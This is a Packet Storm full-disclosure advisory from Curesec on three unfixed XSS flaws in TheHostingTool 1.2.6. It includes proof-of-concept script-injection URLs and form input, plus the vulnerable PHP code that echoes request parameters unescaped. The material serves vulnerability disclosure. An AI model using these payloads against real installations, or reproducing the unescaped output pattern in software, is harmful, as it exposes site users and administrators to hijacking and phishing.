TheHostingTool 1.2.6 Cross Site Scripting

2015-11-09T00:00:00
ID PACKETSTORM:134267
Type packetstorm
Reporter Tim Coen
Modified 2015-11-09T00:00:00

Description

                                        
                                            `Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: TheHostingTool 1.2.6  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: https://thehostingtool.com/  
Vulnerability Type: XSS  
Remote Exploitable: Yes  
Reported to vendor: 09/07/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Description  
  
There are two reflected and one persistent XSS in TheHostingTool 1.2.6. With  
this, it is possible to bypass CSRF protection, inject JavaScript keyloggers,  
or perform phishing attacks.  
  
3. Details  
  
Reflected XSS 1  
  
Proof of Concept:  
  
  
http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=<script>alert(1)</script>&status  
  
Code:  
  
  
includes/ajax.php  
function notice() {  
global $style;  
if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {  
if($_REQUEST['status'] == "good") {  
$status = true;  
} else {  
$status = false;  
}  
echo $style->notice($status, $_REQUEST['message']);  
}  
return true;  
}  
  
includes/class_style.php  
public function notice($good, $message) {  
if($good) {  
//Cool! Everything's OK.  
$color = "green";  
}  
else {  
//Oh no! It's a bad message!  
$color = "red";  
}  
$notice = '<strong><em style="color: '. $color .';">';  
$notice .= $message;  
$notice .= '</em></strong>';  
return $notice;  
}  
  
Reflected XSS 2  
  
Proof of Concept:  
  
  
http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid="><script>alert(1)</script>  
  
Code:  
  
  
invoices.php:  
class page {  
public function content(){ # Displays the page  
global $style, $db, $main, $invoice;  
if(isset($_GET['iid']) and isset($_GET['pay'])){  
$invoice->set_paid($_GET['iid']);  
echo "<span style='color:green'>Invoice #{$_GET['iid']} marked as paid. <a href='index.php?page=invoices&iid={$_GET['iid']}&unpay=true'>Undo this action</a></span>";  
}  
elseif(isset($_GET['iid']) and isset($_GET['unpay'])){  
$invoice->set_unpaid($_GET['iid']);  
echo "<span style='color:red'>Invoice {$_GET['iid']} marked as unpaid. <a href='index.php?page=invoices&iid={$_GET['iid']}&pay=true'>Undo this action</a></span>";  
}  
  
Persistent XSS  
  
Proof of Concept:  
  
1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/  
2. When asked for a domain, enter: http://ex.<script>alert(1)</script>.com  
3. visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or http://  
localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID  
  
4. Solution  
  
This issue has not been fixed  
  
5. Report Timeline  
  
09/07/2015 Informed Vendor about Issue (no reply)  
09/22/2015 Reminded Vendor of disclosure date (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html  
  
  
`